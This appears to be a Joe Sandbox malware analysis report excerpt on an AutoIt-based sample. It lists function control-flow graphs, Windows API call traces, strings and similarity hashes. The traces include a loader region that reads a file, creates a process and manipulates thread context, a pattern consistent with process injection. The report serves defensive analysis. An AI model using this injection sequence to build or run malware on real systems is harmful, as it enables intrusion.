                                                          control_flow_graph 993 24e25f0-24e269e call 24e0000 996 24e26a5-24e26cb call 24e3500 CreateFileW 993->996 999 24e26cd 996->999 1000 24e26d2-24e26e2 996->1000 1001 24e281d-24e2821 999->1001 1005 24e26e9-24e2703 VirtualAlloc 1000->1005 1006 24e26e4 1000->1006 1002 24e2863-24e2866 1001->1002 1003 24e2823-24e2827 1001->1003 1007 24e2869-24e2870 1002->1007 1008 24e2829-24e282c 1003->1008 1009 24e2833-24e2837 1003->1009 1010 24e270a-24e2721 ReadFile 1005->1010 1011 24e2705 1005->1011 1006->1001 1012 24e28c5-24e28da 1007->1012 1013 24e2872-24e287d 1007->1013 1008->1009 1014 24e2839-24e2843 1009->1014 1015 24e2847-24e284b 1009->1015 1018 24e2728-24e2768 VirtualAlloc 1010->1018 1019 24e2723 1010->1019 1011->1001 1022 24e28dc-24e28e7 VirtualFree 1012->1022 1023 24e28ea-24e28f2 1012->1023 1020 24e287f 1013->1020 1021 24e2881-24e288d 1013->1021 1014->1015 1016 24e284d-24e2857 1015->1016 1017 24e285b 1015->1017 1016->1017 1017->1002 1024 24e276f-24e278a call 24e3750 1018->1024 1025 24e276a 1018->1025 1019->1001 1020->1012 1026 24e288f-24e289f 1021->1026 1027 24e28a1-24e28ad 1021->1027 1022->1023 1033 24e2795-24e279f 1024->1033 1025->1001 1029 24e28c3 1026->1029 1030 24e28af-24e28b8 1027->1030 1031 24e28ba-24e28c0 1027->1031 1029->1007 1030->1029 1031->1029 1034 24e27d2-24e27e6 call 24e3560 1033->1034 1035 24e27a1-24e27d0 call 24e3750 1033->1035 1040 24e27ea-24e27ee 1034->1040 1041 24e27e8 1034->1041 1035->1033 1043 24e27fa-24e27fe 1040->1043 1044 24e27f0-24e27f4 CloseHandle 1040->1044 1041->1001 1045 24e280e-24e2817 1043->1045 1046 24e2800-24e280b VirtualFree 1043->1046 1044->1043 1045->996 1045->1001 1046->1045
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 024E26C1
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 024E28E7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction ID: a8a3fc25e09bef5cb0fa4831a756b827b7ec8dc2dae32011b7356231fbac3b82
                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction Fuzzy Hash: 59A11A74E00209EBEF14CFA4C855BEEB7B5BF48705F10865AE512BB280D7B59A85CF50
                                                          Function 003439E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1114 3439e7-343a57 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A15
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A36
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00343A4A
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00343A53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                                          • Instruction ID: 4cddf0b51f4a1c5ddd6490b280d254647f40bd5fa17dda66e96a57cc2ac13fdb
                                                          • Opcode Fuzzy Hash: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                                          • Instruction Fuzzy Hash: 4DF01770500294BEEA2157236C0CE6B2E7EDBC6F50F00407EB904F2160C2751C10CEB4
                                                          Function 024E23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1115 24e23b0-24e24f1 call 24e0000 call 24e22a0 CreateFileW 1122 24e24f8-24e2508 1115->1122 1123 24e24f3 1115->1123 1126 24e250f-24e2529 VirtualAlloc 1122->1126 1127 24e250a 1122->1127 1124 24e25a8-24e25ad 1123->1124 1128 24e252d-24e2544 ReadFile 1126->1128 1129 24e252b 1126->1129 1127->1124 1130 24e2548-24e2582 call 24e22e0 call 24e12a0 1128->1130 1131 24e2546 1128->1131 1129->1124 1136 24e259e-24e25a6 ExitProcess 1130->1136 1137 24e2584-24e2599 call 24e2330 1130->1137 1131->1124 1136->1124 1137->1136
                                                          APIs
                                                            • Part of subcall function 024E22A0: Sleep.KERNELBASE(000001F4), ref: 024E22B1
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E24E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: WN8LG0D0OQIQ7L438
                                                          • API String ID: 2694422964-2893018241
                                                          • Opcode ID: ce5b878b1b0c0a5e4fc97e0af66cad9dbebad6d8f810168ac6c811cf96933d1a
                                                          • Instruction ID: 7769cd89b44792c6696d899733d51a2f3d0eea9fb1496eba6aaa0acb38fd8c62
                                                          • Opcode Fuzzy Hash: ce5b878b1b0c0a5e4fc97e0af66cad9dbebad6d8f810168ac6c811cf96933d1a
                                                          • Instruction Fuzzy Hash: 49518070D04248EBEF11DBA4C858BEEBB79AF18301F004199E649BB2C0D7B91B45CB65
                                                          Function 003469CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1519 3469ca-3469f1 call 344f3d 1522 3469f7-346a05 call 344f3d 1519->1522 1523 37e38a-37e39a call 3a9604 1519->1523 1522->1523 1528 346a0b-346a11 1522->1528 1527 37e39f-37e3a1 1523->1527 1529 37e3a3-37e3a6 call 344faa 1527->1529 1530 37e3c0-37e408 call 360f36 1527->1530 1532 346a17-346a39 call 346bec 1528->1532 1533 37e3ab-37e3ba call 3a4339 1528->1533 1529->1533 1539 37e42d 1530->1539 1540 37e40a-37e414 1530->1540 1533->1530 1543 37e42f-37e442 1539->1543 1542 37e428-37e429 1540->1542 1544 37e416-37e425 1542->1544 1545 37e42b 1542->1545 1546 37e5b9-37e5ca call 362ed5 call 344faa 1543->1546 1547 37e448 1543->1547 1544->1542 1545->1543 1557 37e5cc-37e5dc call 347776 call 345efb 1546->1557 1549 37e44f-37e452 call 3475e0 1547->1549 1552 37e457-37e479 call 345f12 call 3a7492 1549->1552 1563 37e48d-37e497 call 3a747c 1552->1563 1564 37e47b-37e488 1552->1564 1570 37e5e1-37e611 call 39fad2 call 360fac call 362ed5 call 344faa 1557->1570 1572 37e4b1-37e4bb call 3a7466 1563->1572 1573 37e499-37e4ac 1563->1573 1566 37e580-37e590 call 34766f 1564->1566 1566->1552 1575 37e596-37e5a0 call 3474bd 1566->1575 1570->1557 1582 37e4cf-37e4d9 call 345f8a 1572->1582 1583 37e4bd-37e4ca 1572->1583 1573->1566 1581 37e5a5-37e5b3 1575->1581 1581->1546 1581->1549 1582->1566 1588 37e4df-37e4f7 call 39fa6e 1582->1588 1583->1566 1594 37e51a-37e51d 1588->1594 1595 37e4f9-37e518 call 347f41 call 345a64 1588->1595 1597 37e51f-37e53a call 347f41 call 346999 call 345a64 1594->1597 1598 37e54b-37e54e 1594->1598 1619 37e53b-37e549 call 345f12 1595->1619 1597->1619 1600 37e550-37e559 call 39f98f 1598->1600 1601 37e56e-37e571 call 3a7428 1598->1601 1600->1570 1613 37e55f-37e569 call 360fac 1600->1613 1608 37e576-37e57f call 360fac 1601->1608 1608->1566 1613->1552 1619->1608
                                                          APIs
                                                            • Part of subcall function 00344F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344F6F
                                                          • _free.LIBCMT ref: 0037E5BC
                                                          • _free.LIBCMT ref: 0037E603
                                                            • Part of subcall function 00346BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346D0D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 2861923089-1757145024
                                                          • Opcode ID: e0ca428707c9bee0373e0e6626cfc32247b9c72b53571ffe11e0792c3c6da93c
                                                          • Instruction ID: 5aa8cf826cb924b95371b102280627894fe0eb4642fbcfe7a44b0545423b7f99
                                                          • Opcode Fuzzy Hash: e0ca428707c9bee0373e0e6626cfc32247b9c72b53571ffe11e0792c3c6da93c
                                                          • Instruction Fuzzy Hash: AC915D71910219AFCF16EFA5CC919EDB7B8FF09314B148469F815AF2A1EB34AD05CB50
                                                          Function 003435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003435A1,SwapMouseButtons,00000004,?), ref: 003435D4
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 003435F5
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 00343617
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                                          • Instruction ID: de96766eb7374da28f2e1b2bc7a95a09846b954bf061f96a978116487ca974c0
                                                          • Opcode Fuzzy Hash: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                                          • Instruction Fuzzy Hash: EF114571614219BFDB229F64DC80EAEBBFDEF04740F128469E805DB210E275AE409BA0
                                                          Function 024E12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 024E1A5B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 024E1AF1
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024E1B13
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
                                                          • Instruction ID: ae0f34013d5516d6264cbc80c22f7b01cf392e4f5258920f168c91706bf27bbf
                                                          • Opcode Fuzzy Hash: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
                                                          • Instruction Fuzzy Hash: DD620B30A14258DBEB24DFA4C850BEEB376EF58301F1091A9D10DEB394E7B59E81CB59
                                                          Function 003A9604 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00345045: _fseek.LIBCMT ref: 0034505D
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98CD
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98E0
                                                          • _free.LIBCMT ref: 003A974B
                                                          • _free.LIBCMT ref: 003A9752
                                                          • _free.LIBCMT ref: 003A97BD
                                                            • Part of subcall function 00362ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00369BA4), ref: 00362EE9
                                                            • Part of subcall function 00362ED5: GetLastError.KERNEL32(00000000,?,00369BA4), ref: 00362EFB
                                                          • _free.LIBCMT ref: 003A97C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
                                                          • Instruction ID: 1878952d0d7245678585fb592a798164e0db18802e8f600f2e455a4fc2fe9b49
                                                          • Opcode Fuzzy Hash: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
                                                          • Instruction Fuzzy Hash: 215162B1D04618AFDF259F64CC85B9EBBB9EF48310F1044AEF609AB251DB715980CF58
                                                          Function 0036487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                          • Instruction ID: 173cdcc6029f3293f04f66e9a7a3bb33739437ef2259d4acf3f70dd97549146b
                                                          • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                          • Instruction Fuzzy Hash: 09410631F047069FDB1A9F69C8809AF7BEAAF46360B24C63DE855CB648D771DD808B40
                                                          Function 00344DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3!P/=$EA06
                                                          • API String ID: 4104443479-3802933467
                                                          • Opcode ID: 8e21ef0cc37d8c84c5e15596e64a6121a38d6ac0b9154e9d3a86dec5b8fbaf34
                                                          • Instruction ID: 58ab9574c87cde04a232d02a93e673ccb6fc7d03e8330220a8084e1c43689d1c
                                                          • Opcode Fuzzy Hash: 8e21ef0cc37d8c84c5e15596e64a6121a38d6ac0b9154e9d3a86dec5b8fbaf34
                                                          • Instruction Fuzzy Hash: 85415D61A041585BDF239F64C8517BF7BE6AF05300F698075F882AF183C625BDC597E1
                                                          Function 003473E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0037ED92
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0037EDDC
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                            • Part of subcall function 00360911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00360930
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 4671b835eb374a1b235267d98c5ddb9d205c79368298cc4cf5158dc99d0c26f8
                                                          • Instruction ID: b0ae053e8b805b5c883f2522cce0ea6dd7cdfbb43c3cf2fb6f31316445679165
                                                          • Opcode Fuzzy Hash: 4671b835eb374a1b235267d98c5ddb9d205c79368298cc4cf5158dc99d0c26f8
                                                          • Instruction Fuzzy Hash: 6F21A431A0025C9BDF169F94C845BEE7BF99F49704F008059E508AF241DBB469498F91
                                                          Function 003A998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 003A99A1
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A99B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                                          • Instruction ID: e5731f6acfb206bc074afbace39c3bc9ef32a5bc54be1774bb184427ea3c021b
                                                          • Opcode Fuzzy Hash: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
                                                          • Instruction Fuzzy Hash: 08D05B7954030D6FDB519B90DC0DFEA773CD704700F0006B1FB54D1091DA7065548B91
                                                          Function 003BCBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3feef706215629c2dc94d3fa7170881c6f675fcbd8b8892affd1358ff9d208a
                                                          • Instruction ID: d4b85e3adca88cee5777275d07c6590ce0eac7474b45cb3007fd1dbe2585bbed
                                                          • Opcode Fuzzy Hash: f3feef706215629c2dc94d3fa7170881c6f675fcbd8b8892affd1358ff9d208a
                                                          • Instruction Fuzzy Hash: 7BF138706083019FCB25DF28C480A6ABBE5FF88318F14892EF9999B751D771E945CF82
                                                          Function 0036588C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 003658A3
                                                            • Part of subcall function 0036A2EB: __NMSG_WRITE.LIBCMT ref: 0036A312
                                                            • Part of subcall function 0036A2EB: __NMSG_WRITE.LIBCMT ref: 0036A31C
                                                          • __NMSG_WRITE.LIBCMT ref: 003658AA
                                                            • Part of subcall function 0036A348: GetModuleFileNameW.KERNEL32(00000000,004033BA,00000104,?,00000001,00000000), ref: 0036A3DA
                                                            • Part of subcall function 0036A348: ___crtMessageBoxW.LIBCMT ref: 0036A488
                                                            • Part of subcall function 0036321F: ___crtCorExitProcess.LIBCMT ref: 00363225
                                                            • Part of subcall function 0036321F: ExitProcess.KERNEL32 ref: 0036322E
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          • RtlAllocateHeap.NTDLL(01730000,00000000,00000001,00000000,?,?,?,00360F53,?), ref: 003658CF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: b52bf4434616439aa66850ce4336bffaac740ba8ca3133f9cce4fa2d75e8f615
                                                          • Instruction ID: 2b7fa49f3078493c7062a67b2b74f634300751cab815375ecde786b5c8195257
                                                          • Opcode Fuzzy Hash: b52bf4434616439aa66850ce4336bffaac740ba8ca3133f9cce4fa2d75e8f615
                                                          • Instruction Fuzzy Hash: 2F01F132380B019BD6133B75EC02A6E779CDF82761F11853AF601EF68ADFB09E004665
                                                          Function 003A994B Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003A95F1,?,?,?,?,?,00000004), ref: 003A9964
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003A997A
                                                          • CloseHandle.KERNEL32(00000000,?,003A95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A9981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
